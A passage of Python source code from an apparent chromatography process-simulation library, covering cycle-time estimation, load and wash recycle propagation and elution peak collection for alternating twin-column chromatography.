"""Calc where the elution peak gets collected."""
self._elution_peak_mask = \
_np.ones(int(round(self._elution_t / self._dt)), dtype=bool)
self._elution_peak_mask[self._elution_peak_cut_end_i:] = False
self._elution_peak_mask[:self._elution_peak_cut_start_i] = False
self.log.d_data(self._log_tree,
"elution_peak_interval",
self._elution_peak_mask)
def _update_load_btc(self):
"""Update load breakthrough profile."""
assert self._cv > 0, "CV must be defined by now."
self.load_bt.update_btc_parameters(cv=self._cv)
def _calc_regeneration_t(self):
"""Calc regeneration step duration."""
if self.regeneration_cv > 0:
eq_f = self._get_flow_value("Regeneration",
"regeneration_f",
self.regeneration_f,
self.regeneration_f_rel)
self._regeneration_t = self._get_time_value("Regeneration",
"regeneration_t",
self.regeneration_t,
self.regeneration_cv,
eq_f)
else:
self._regeneration_t = max(self.regeneration_t, 0)
# Log.
self.log.i_data(self._log_tree, 'regeneration_t', self._regeneration_t)
def _update_load_recycle_pdf(self, flow):
"""Update pdf that describes propagation of recycled material.
Recycled material si composed of unbound (load) and desorbed
(wash) material throughout the column.
`self.load_recycle_pdf` gets updated.
"""
assert self.load_recycle_pdf is not None, \
f"`load_recycle_pdf` must be defined by now."
assert self.column_porosity_retentate > 0, \
f"Retentate porosity must be defined by now."
assert self._cv > 0, "CV must be defined by now."
v_void = self._cv * self.column_porosity_retentate
self.load_recycle_pdf.update_pdf(v_void=v_void,
f=flow,
rt_mean=v_void / flow)
self._p_load_recycle_pdf = self.load_recycle_pdf.get_p()
def _calc_load_recycle_wash_i(self):
"""Calculate wash recycle duration in form of time steps."""
if self.wash_recycle_duration_t > 0 \
or self.wash_recycle_duration_cv > 0:
self._wash_recycle_i_duration = int(self._get_time_value(
"Wash recycle", "load_wash_recycle_t",
self.wash_recycle_duration_t,
self.wash_recycle_duration_cv,
self._wash_f
) / self._dt)
else:
# Same as wash duration.
assert self._wash_t > 0
self._wash_recycle_i_duration = int(round(self._wash_t / self._dt))
def _get_load_bt_cycle_switch_criteria(self,
load_c_ss: _np.ndarray
) -> _np.ndarray:
"""Get steady-state cycle switch (== end of load) criteria.
Parameters
----------
load_c_ss
Load concentration during steady state operation.
Returns
-------
ndarray
Threshold concentration for load breakthrough.
"""
assert self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0, \
f"Load step duration should be defined!"
if self.load_c_end_ss is not None:
load_c_end_ss = self.load_c_end_ss
if self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined by `load_c_end_ss`"
f" and `load_c_end_relative_ss`."
f" Simulation is using `load_c_end_ss`.")
else: # self.load_c_end_relative_ss > 0
load_c_end_ss = self.load_c_end_relative_ss * load_c_ss
# Log.
self.log.i_data(self._log_tree,
'load_c_end_ss',
load_c_end_ss)
return load_c_end_ss
# noinspection DuplicatedCode
def _calc_cycle_t(self):
"""Calculates cycle time (== load time for a single column).
Optional delay of first cycle is not part of this calculation.
"""
assert self._cv > 0
assert self._load_f > 0
if self.load_cv > 0:
t_cycle = self.load_cv * self._cv / self._load_f
if self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined in more than one way."
f" Simulation is using `load_cv`.")
else:
# Get bt profile for constant inlet.
# Inlet conc.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# Simulate first cycle at constant load concentration.
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# Propagate breakthrough.
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
# Calc cycle duration.
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
t_cycle = i_t_first_cycle * self._dt
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_wash_desorbed = self._sim_c_wash_desorption(
f_first_load[:i_t_first_cycle],
c_first_load[:, :i_t_first_cycle]
- bt_first_load[:, :i_t_first_cycle])
else:
c_wash_desorbed = None
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(
f_first_load[:i_t_first_cycle],
bt_first_load[:, :i_t_first_cycle],
c_wash_desorbed)
if self.load_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
i_load_recycle_start = self._wash_recycle_i_duration \
if self.wash_recycle else 0
m_load_recycle = \
bt_first_load_out[
:,
i_load_recycle_start:i_t_first_cycle
].sum() * self._load_f * self._dt
_t_diff = m_load_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._load_recycle_m_ss = m_load_recycle
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_bt_recycle',
_t_diff)
if self.wash_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
m_wash_recycle = bt_first_wash_out[
:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
_t_diff = m_wash_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._wash_recycle_m_ss = m_wash_recycle
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_wash_recycle',
_t_diff)
if self.load_c_end_estimate_with_iterative_solver \
and (self.wash_recycle or self.load_recycle):
c_load_fist_cycle = load_c_ss * _np.ones([len(binding_species),
i_t_first_cycle * 2])
def sim_cycle(f_load: _np.ndarray,
c_load: _np.ndarray,
i_prev_cycle: int) -> _typing.Tuple[_np.ndarray,
_np.ndarray,
int]:
"""Simulates load-wash cycle. Calc load duration.
Load duration is determined based on breakthrough
criteria.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load conc profile.
i_prev_cycle
Previous cycle duration in time steps.
Returns
-------
f_load_next_cycle
Load and wash breakthrough flow rate profile.
c_load_next_cycle
Load and wash breakthrough conc profile.
i_cycle
Current cycle duration in time steps.
"""
# Load.
bt_load: _np.ndarray = \
c_load - self.load_bt.calc_c_bound(f_load, c_load)
# Propagate breakthrough.
bt_load_out, _ = self._sim_c_recycle_propagation(
f_load,
bt_load,
None)
# 'Stop' load at specified breakthrough criteria.
# noinspection PyTypeChecker
i_cycle_duration = _utils.vectors.true_start(
bt_load_out.sum(0) >= load_c_end_ss.sum())
# Cut load at specified time.
bt_load = bt_load[:, :i_cycle_duration]
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_first_wash_desorbed = self._sim_c_wash_desorption(
f_load[:i_cycle_duration],
c_load[:, :i_cycle_duration]
- bt_load[:, :i_cycle_duration])
else:
c_first_wash_desorbed = None
# Propagate load and wash leftovers.
bt_load_out, bt_wash_out = self._sim_c_recycle_propagation(
f_load[:i_cycle_duration],
bt_load,
c_first_wash_desorbed)
# Construct load for next cycle.
# Recycle load.
if self.load_recycle:
rec_load = bt_load_out[:,
i_prev_cycle:i_cycle_duration]
else:
rec_load = _np.zeros_like(
bt_load_out[:, i_prev_cycle:i_cycle_duration])
# Next load profiles.
c_next_load = _np.concatenate((rec_load,
c_load_fist_cycle),
axis=1)
f_next_load = self._load_f * _np.ones(c_next_load.shape[1])
wash_recycle_i_duration = self._wash_recycle_i_duration \
if self.wash_recycle else 0
# Log.
m_load_recycle_ss = \
bt_first_load_out[
:,
wash_recycle_i_duration:i_t_first_cycle
].sum() * self._load_f * self._dt
self._load_recycle_m_ss = m_load_recycle_ss
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle_ss)
# Recycle wash.
if self.wash_recycle:
c_next_load[:, :self._wash_recycle_i_duration] = \
bt_wash_out[:, :self._wash_recycle_i_duration]
f_next_load[:self._wash_recycle_i_duration] = \
self._wash_f
m_wash_recycle_ss = \
bt_wash_out[:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
self._wash_recycle_m_ss = m_wash_recycle_ss
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle_ss)
# Return next load and cycle duration.
return f_next_load, c_next_load, \
i_cycle_duration - i_prev_cycle
f_load_cycle = \
self._load_f * _np.ones(c_load_fist_cycle.shape[1])
c_load_cycle = c_load_fist_cycle
i_t_cycle_prev = i_t_first_cycle
i_t_cycle_estimate = 0
# Loop until cycle duration converges.
for i in range(
self.load_c_end_estimate_with_iter_solver_max_iter):
if abs(i_t_cycle_prev - i_t_cycle_estimate) <= 1:
self.log.i_data(self._log_tree,
"t_cycle_optimization_loop_iter",
i)
break
i_t_cycle_prev = i_t_cycle_estimate
f_load_cycle, c_load_cycle, i_t_cycle_estimate = \
sim_cycle(f_load_cycle, c_load_cycle, i_t_cycle_prev)
# print([i, i_t_cycle_prev, i_t_cycle_estimate])
if abs(i_t_cycle_prev - i_t_cycle_estimate) > 1:
self.log.w("Cycle duration estimator did not converge.")
t_cycle = i_t_cycle_estimate * self._dt
elif self.load_c_end_estimate_with_iterative_solver:
self.log.i(f"No need to use iterative solver in case of"
f" no recycling of load and/or wash.")
self._cycle_t = t_cycle
self.log.i_data(self._log_tree, 'cycle_t', t_cycle)
# noinspection DuplicatedCode
def _calc_first_cycle_extension_t(self):
"""Calc extension of first load.
First load step might be extended for processes with load and/or
wash recycle in order to get faster into steady-state regime.
"""
if not self.load_recycle and not self.wash_recycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without load recycle.")
self._first_cycle_extension_t = 0
return
elif not self.load_extend_first_cycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without extended first cycle.")
self._first_cycle_extension_t = 0
return
elif self.load_extend_first_cycle_t > 0:
self._first_cycle_extension_t = self.load_extend_first_cycle_t
return
elif self.load_extend_first_cycle_cv >= 0:
assert self._cv > 0, "CV should be defined by now."
assert self._load_f > 0, "Load flow rate should be defined by now."
self._first_cycle_extension_t = \
self.load_extend_first_cycle_cv * self._cv / self._load_f
elif self.load_cv > 0:
raise NotImplementedError(
f"Estimation of first cycle extension is only supported"
f" if the cycle length is defined by breakthrough cutoff"
f" criteria. This is due to the fact that if all the"
f" breakthrough material gets recycles,"
f" there is no single steady-state.")
else:
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# simulate first cycle at constant load concentration
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# propagate breakthrough
bt_first_load_out, _ = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
dm = 0
if self.load_recycle:
assert hasattr(self, "_load_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._load_recycle_m_ss
if self.wash_recycle:
assert hasattr(self, "_wash_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._wash_recycle_m_ss
di = 0
if dm > 0:
m_ext_bt = _np.cumsum(
bt_first_load_out.sum(0)[i_t_first_cycle:]
) * self._load_f * self._dt
di += _utils.vectors.true_start(m_ext_bt >= dm)
self._first_cycle_extension_t = di * self._dt
def _calc_cycle_start_i_list(self):
"""Calculate load switch positions in form of time steps."""
assert self._cycle_t > 0, \
f"Cycle length must have been determined" \
f" (by `_calc_cycle_t()`) by now"
flow_i_start, flow_i_end = \
_utils.vectors.true_start_and_end(self._f > 0)
if self.load_extend_first_cycle:
assert self._first_cycle_extension_t >= 0, \
f"Prolong of first load cycle is set to `True`," \
f" but the length is undefined."
if self._first_cycle_extension_t == 0:
self.log.w(f"Prolong of first load cycle is set to `True`,"
f" but the length of the extension is 0.")
load_extend_first_cycle_t = self._first_cycle_extension_t
self.log.i_data(self._log_tree,
"load_extend_first_cycle_t",
load_extend_first_cycle_t)
else:
load_extend_first_cycle_t = 0
cycle_start_t_list = _np.arange(
self._t[flow_i_start] + load_extend_first_cycle_t,
self._t[flow_i_end - 1],
self._cycle_t
)
cycle_start_t_list[0] = self._t[flow_i_start]
self._cycle_start_i_list = _np.rint(
cycle_start_t_list / self._dt).astype(_np.int32)
self.log.i_data(self._log_tree,
"cycle_start_t_list",
cycle_start_t_list)
def _prepare_simulation(self):
"""Prepare everything before cycle-by-cycle simulation."""
self._assert_non_binding_species()
self._calc_load_f()
self._calc_cv() # might depend on load_f
self._report_column_dimensions() # optional
# Equilibration.
self._calc_equilibration_t()
# Wash.
self._calc_wash_t_and_f()
# Elution.
self._calc_elution_t_and_f()
self._calc_elution_peak_t()
self._update_elution_peak_pdf()
self._calc_elution_peak_cut_i_start_and_i_end()
self._calc_elution_peak_mask()
# Regeneration.
self._calc_regeneration_t()
# Prepare for estimation of cycle length.
self._update_load_btc()
if self.load_recycle:
self._update_load_recycle_pdf(self._wash_f)
if self.wash_recycle:
self._calc_load_recycle_wash_i()
# Cycle time.
self._calc_cycle_t()
if self.load_extend_first_cycle:
self._calc_first_cycle_extension_t()
# Cycle start positions == column load switch time points.
self._calc_cycle_start_i_list()
# Make sure cycle duration is long enough.
_t_cycle_except_load = self._equilibration_t + self._wash_t \
+ self._elution_t + self._regeneration_t
if self._cycle_t < _t_cycle_except_load:
self.log.e(f"Load step ({self._cycle_t}) should not be shorter"
f" than eq_t + wash_t + elution_t + regeneration_t"
f" ({_t_cycle_except_load: .6})!")
def _sim_c_load_binding(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Determine what part of load binds.
Load in this context might also contain wash and load recycle
from previous steps.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load concentration profile.
Returns
-------
c_bound
Conc profile of bound material.
c_unbound
Conc profile of unbound material = `c_load` - `c_bound`.
"""
assert f_load.size == c_load.shape[1], \
"f_load and c_load must have the same length"
assert c_load.shape[0] == \
self._n_species - len(self.non_binding_species), \
"c_load must contain all binding species"
c_bound = self.load_bt.calc_c_bound(f_load, c_load)
# Returns bound and unbound part.
return c_bound, c_load - c_bound
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
The step has no default logic.
Thus it raises `NotImplementedError` if called.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
Raises
------
NotImplementedError
This method has no default implementation. Thus it being
called it will raise the error.
"""
# Not implemented in core this class, as there is
# no consensus on typical dynamics and the way to describe it.
raise NotImplementedError("Function not implemented in this class")
def _sim_c_recycle_propagation(
self,
f_unbound: _np.ndarray,
c_unbound: _np.ndarray,
c_wash_desorbed: _typing.Optional[_np.ndarray]
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Propagate unbound and desorbed material through the column.
Unbound (breakthrough during load) and desorbed (during wash)
sections might have a different flow rates as they come from
different steps - load and wash.
Parameters
----------
f_unbound
Flow rate profile during 'total load' step for a cycle.
The step includes wash recycle, load recycle and load step.
c_unbound
Conc profile of overloaded material during load step
(plus previous wash and load recycle).
c_wash_desorbed
Conc profile of desorbed material during wash step.
Returns
-------
c_unbound_propagated
Propagated conc profile of overloaded material.
c_wash_desorbed_propagated
Propagated conc profile of desorbed material.
"""
assert hasattr(self, "_wash_f") and self._wash_f > 0
assert hasattr(self, "_wash_t") and self._wash_t > 0
assert self.load_recycle_pdf is not None
assert c_unbound.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_unbound.shape[1] == f_unbound.size
if c_wash_desorbed is None or c_wash_desorbed.size == 0:
c_wash_desorbed = _np.zeros([
self._n_species - len(self.non_binding_species),
int(round(self._wash_t / self._dt))])
else:
assert c_wash_desorbed.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_wash_desorbed.shape[1] == \
int(round(self._wash_t / self._dt))
# Combine on volumetric scale.
v_load = self._dt * f_unbound.cumsum()
v_wash = v_load[-1] + \
self._dt * _np.arange(1, c_wash_desorbed.shape[1] + 1) \
* self._wash_f
min_flow = min(f_unbound.min(), self._wash_f)
dv = min_flow * self._dt
v = _np.arange(dv,
(v_wash[-1] if v_wash.size > 0 else v_load[-1]) + dv,
dv)
c_v_combined = _interp.interp1d(
_np.concatenate((v_load, v_wash), axis=0),
_np.concatenate((c_unbound, c_wash_desorbed), axis=1),
fill_value="extrapolate"
)(v)
c_v_combined[c_v_combined < 0] = 0
# Simulate traveling of leftover material through the column.
self._update_load_recycle_pdf(min_flow)
c_v_combined_propagated = _utils.convolution.time_conv(
self._dt, c_v_combined, self._p_load_recycle_pdf)
# Split back on time scale.
c_combined_propagated = _interp.interp1d(
v,
c_v_combined_propagated,
fill_value="extrapolate"
)(_np.concatenate((v_load, v_wash), axis=0))
c_combined_propagated[c_combined_propagated < 0] = 0
c_unbound_propagated = c_combined_propagated[:, :v_load.size]
c_wash_desorbed_propagated = c_combined_propagated[:, v_load.size:]
return c_unbound_propagated, c_wash_desorbed_propagated
def _sim_c_elution_desorption(self,
m_bound: _np.ndarray
) -> _typing.Tuple[_np.ndarray,
_np.ndarray]:
"""Simulate elution step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column.
`m_bound.size == n_species`
Returns
-------
c_elution
Outlet concentration profile during the elution.
b_elution_peak
Boolean vector. Peak is collected where the value is `True`.
"""
assert self._elution_f > 0
assert self._elution_t > 0
i_elution_duration = int(round(self._elution_t / self._dt))
# Multiply elution peak with the amount of captured product.
c_elution = \
self._p_elution_peak[_np.newaxis, :i_elution_duration] * \
m_bound[:, _np.newaxis] / self._elution_f
# Pad with zeros to cover the entire elution step duration.
if c_elution.shape[1] < i_elution_duration:
c_elution = _np.pad(c_elution,
((0, 0),
(0, i_elution_duration - c_elution.shape[1])),
mode="constant")
# Boolean mask - `True` where peak is being collected.
b_elution_peak = self._elution_peak_mask
return c_elution, b_elution_peak
def _sim_c_elution_buffer(self, n_time_steps: int) -> _np.ndarray:
"""Get elution buffer composition at the outlet of the column.
By default the buffer composition is constant throughout the
elution step.
Feel free to override this function if you want to simulate
linear gradient or if the transient phenomena at the beginning
of peak cut needs to be considered.
Parameters
----------
n_time_steps
Duration of elution step in number of time steps.
Returns
-------
ndarray
Buffer concentration profile at the outlet of the column
during the elution step.
"""
# Elution buffer composition.
elution_buffer_composition = \
self.elution_buffer_c.reshape(self.elution_buffer_c.size, 1)
assert elution_buffer_composition.size == 0 \
or elution_buffer_composition.size == self._n_species, \
f"Elution buffer composition must be either empty or have" \
f" a concentration value for each specie."
assert _np.all(elution_buffer_composition >= 0), \
"Concentration values in elution buffer must be >= 0"
if elution_buffer_composition.size == 0:
elution_buffer_composition = _np.zeros([self._n_species, 1])
self.log.i_data(self._log_tree,
"elution_buffer_composition",
elution_buffer_composition)
# Constant profile.
c_elution_buffer = elution_buffer_composition \
* _np.ones_like(self._t[:n_time_steps])
return c_elution_buffer
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _sim_c_regeneration(self,
m_bound: _np.ndarray
) -> _typing.Optional[_np.ndarray]:
"""Simulate regeneration step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column at
the beginning of the regeneration step.
`m_bound.size == n_species`.
Returns
-------
Optional[ndarray]
Outlet concentration profile during regeneration step.
E.g. regeneration peak.
"""
# No default implementation.
c_regeneration = None
return c_regeneration
def _sim_c_out_cycle(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_typing.Optional[_np.ndarray],
_typing.Optional[_np.ndarray],
_np.ndarray,
_np.ndarray,
_typing.Optional[_np.ndarray]]:
"""Simulates load-wash-elution-regeneration steps.
Regeneration is optional.
This function can be replaced in case user wants to use some
other variation of bind-elution dynamics.
Elution peak cut is applied in this function.
Elution peak shape must be defined by now.
Return profiles that are `None` are considered being zero.
Parameters
----------
f_load
Inlet (recycle + load) flow rate profile for a cycle.
The flow rate might be different during wash recycle.
c_load
Inlet (recycle + load) concentration profile.
Returns
-------
c_load
Conc profile at the outlet of the column during load.
c_wash
Conc profile at the outlet of the column during wash.
c_elution
Conc profile at the outlet of the column during elution.
b_elution
Boolean mask for elution step. `True` where peak is being
collected.
c_regeneration
Conc profile at the outlet of the column during
regeneration.
"""
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._elution_f > 0
assert self._elution_t > 0
assert self._load_f > 0
assert self._cv > 0
# Evaluate binding.
c_bound, c_unbound = self._sim_c_load_binding(f_load, c_load)
# Log.
m_load = (c_load * f_load[_np.newaxis, :]).sum(1) * self._dt
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1) * self._dt
self.log.i_data(self._cycle_tree,
"column_utilization",
m_bound / self._cv / self.load_bt.get_total_bc())
self.log.i_data(self._cycle_tree, "m_load", m_load)
self.log.i_data(self._cycle_tree, "m_bound", m_bound)
self.log.i_data(self._cycle_tree, "m_unbound", m_load - m_bound)
self.log.d_data(self._cycle_tree, "f_load", f_load)
self.log.d_data(self._cycle_tree, "c_load", c_load)
self.log.d_data(self._cycle_tree, "c_bound", c_bound)
self.log.d_data(self._cycle_tree, "c_unbound", c_unbound)
# Evaluate desorption during wash.
c_wash_desorbed = None
if self.wash_desorption:
c_wash_desorbed = self._sim_c_wash_desorption(f_load, c_bound)
if c_wash_desorbed.size > 0:
# Subtract desorbed material from bound material.
m_bound -= c_wash_desorbed.sum(1)
# Log.
self.log.i_data(self._cycle_tree,
"m_wash_desorbed",
c_wash_desorbed.sum(1) * self._wash_f * self._dt)
self.log.d_data(self._cycle_tree,
"c_wash_desorbed",
c_wash_desorbed)
# Propagate unbound and desorbed material throughout the column.
c_out_load = c_unbound
c_out_wash = c_wash_desorbed
if self.load_recycle or self.wash_recycle:
c_out_load, c_out_wash = \
self._sim_c_recycle_propagation(f_load,
c_unbound,
c_wash_desorbed)
# Get elution peak.
c_out_elution, elution_peak_mask = \
self._sim_c_elution_desorption(m_bound)
# Log.
m_elution_peak = (c_out_elution * elution_peak_mask[_np.newaxis, :]
).sum(1) * self._elution_f * self._dt
m_elution = c_out_elution.sum(1) * self._elution_f * self._dt
self.log.i_data(self._cycle_tree,
"m_elution_peak", m_elution_peak)
self.log.i_data(self._cycle_tree,
"m_elution", m_elution)
self.log.i_data(self._cycle_tree,
"m_elution_peak_cut_loss", m_elution - m_elution_peak)
# Get regeneration peak.
c_out_regeneration = self._sim_c_regeneration(
m_bound - c_out_elution.sum(1) * self._elution_f * self._dt)
return c_out_load, c_out_wash, c_out_elution, \
elution_peak_mask, c_out_regeneration
def _calculate(self):
# Pre calculate parameters and repetitive profiles.
self._prepare_simulation()
# Assert proper list of binding species.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
assert len(binding_species) > 0
# Copy inlet vectors.
c_in_load = self._c[binding_species].copy()
f_in_load = self._f.copy()
f_in_i_end = min(_utils.vectors.true_end(f_in_load > 0), self._t.size)
c_in_load[:, f_in_i_end:] = 0
# Clear for results.
self._c[:] = 0
self._f[:] = 0
# Prepare logger.
log_data_cycles = list()
self.log.set_branch(self._log_tree, "cycles", log_data_cycles)
# Variable to store wash recycle to.
previous_c_bt_wash: _typing.Optional[_np.ndarray] = None
# Loop across cycles.
for i in range(self._cycle_start_i_list.size):
# Load-wash-elution-regeneration-equilibration steps for a column.
# Load step starts at `self._cycle_start_i_list[i]`.
# Prepare logger for this cycle.
self._cycle_tree = dict()
log_data_cycles.append(self._cycle_tree)
# Load start and end time as the column sees it.
if i > 0 and self.load_recycle:
# Column sees leftovers from previous load during recycling.
cycle_load_i_start = self._cycle_start_i_list[i - 1]
else:
cycle_load_i_start = self._cycle_start_i_list[i]
# Calc cycle end (either next cycle or end or simulation time).
if i + 1 < self._cycle_start_i_list.size:
cycle_load_i_end = self._cycle_start_i_list[i + 1]
else:
cycle_load_i_end = f_in_i_end - 1
# Log results.
self.log.i_data(self._cycle_tree,
"i_cycle_load_start",
cycle_load_i_start)
self.log.i_data(self._cycle_tree,
"i_cycle_load_step_start",
self._cycle_start_i_list[i])
self.log.i_data(self._cycle_tree,
"i_cycle_load_end",
cycle_load_i_end)
# Calc profiles at column outlet.
c_out_load, c_out_wash, c_out_elution, \
b_out_elution, c_out_regeneration = self._sim_c_out_cycle(
f_in_load[cycle_load_i_start:cycle_load_i_end],
c_in_load[:, cycle_load_i_start:cycle_load_i_end]
)
self.log.d_data(self._cycle_tree,
"c_out_load", c_out_load)
self.log.d_data(self._cycle_tree,
"c_out_wash", c_out_wash)
self.log.d_data(self._cycle_tree,
"c_out_elution", c_out_elution)
self.log.d_data(self._cycle_tree,
"b_out_elution", b_out_elution)
self.log.d_data(self._cycle_tree,
"c_out_regeneration", c_out_regeneration)
# Load recycle.
if self.load_recycle:
# Recycle load during the load step.
i_load_start_rel = self._cycle_start_i_list[i] \
- cycle_load_i_start
c_load_recycle = c_out_load[:, i_load_start_rel:]
c_in_load[:, self._cycle_start_i_list[i]:cycle_load_i_end] = \
c_load_recycle
self.log.i_data(self._cycle_tree, "m_load_recycle",
c_load_recycle.sum(1)
* self._load_f * self._dt)
self.log.d_data(self._cycle_tree, "c_load_recycle",
c_load_recycle)
# Losses during load == bt through 2nd column.
c_loss_bt_2nd_column = c_out_load[:, i_load_start_rel]
self.log.i_data(self._cycle_tree, "m_loss_bt_2nd_column",
c_loss_bt_2nd_column.sum()
* self._dt * self._load_f)
self.log.d_data(self._cycle_tree, "c_loss_bt_2nd_column",
c_loss_bt_2nd_column)
else:
# report losses during load
m_loss_load = c_out_load.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_load", m_loss_load)
# Wash recycle.
if self.wash_recycle:
if previous_c_bt_wash is not None \
and previous_c_bt_wash.size > 0:
# Clip wash recycle duration if needed.
i_wash_duration = min(
self._wash_recycle_i_duration,
self._t.size - self._cycle_start_i_list[i])
# Log losses due to discarding load bt during wash recycle.
s = c_in_load[
:,
self._cycle_start_i_list[i]:self._cycle_start_i_list[i]
+ i_wash_duration]
self.log.i_data(self._cycle_tree,
"m_loss_load_bt_during_wash_recycle",
s.sum() * self._dt * self._load_f)
self.log.d_data(self._cycle_tree,
"c_lost_load_during_wash_recycle", s)
self.log.d_data(self._cycle_tree, "c_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration])
self.log.i_data(
self._cycle_tree, "m_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration].sum(1)
* self._dt * self._wash_f)
# Apply previous wash recycle onto the inlet profile.
s[:] = previous_c_bt_wash[:, :i_wash_duration]
f_in_load[self._cycle_start_i_list[i]:
self._cycle_start_i_list[i]
+ i_wash_duration] = self._wash_f
# Save wash from this cycle to be used during the next cycle.
previous_c_bt_wash = c_out_wash
else:
# Report losses during wash.
if c_out_wash is None:
c_out_wash = _np.zeros(
[len(binding_species),
int(round(self._wash_t / self._dt))])
m_loss_wash = c_out_wash.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_wash", m_loss_wash)
# Elution.
[i_el_rel_start, i_el_rel_end] = \
_utils.vectors.true_start_and_end(b_out_elution)
i_el_start = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_start)
i_el_end = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_end)
i_el_rel_end = i_el_rel_start + i_el_end - i_el_start
# Log.
self.log.i_data(self._cycle_tree, "i_elution_start", i_el_start)
self.log.i_data(self._cycle_tree, "i_elution_end", i_el_end)
# Write to global outlet.
self._f[i_el_start:i_el_end] = self._elution_f
self._c[binding_species, i_el_start:i_el_end] = \
c_out_elution[:, i_el_rel_start:i_el_rel_end]
class ACC(AlternatingChromatography):
"""Alternating column chromatography without recycling.
Alternating load-bind-elution twin-column chromatography without
recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "ACC".
Notes
-----
For list of attributes refer to :class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> acc_pro_a = ACC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... uo_id="pro_a_acc",
... gui_title="ProteinA ACC",
... )
>>> acc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> acc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> acc_pro_a.equilibration_f_rel = 1
>>> # Load 10 CVs.
>>> acc_pro_a.load_cv = 20
>>> # Define wash step.
>>> acc_pro_a.wash_cv = 5
>>> # Elution step.
>>> acc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> acc_pro_a.elution_peak_position_cv = 1.2
>>> acc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> acc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
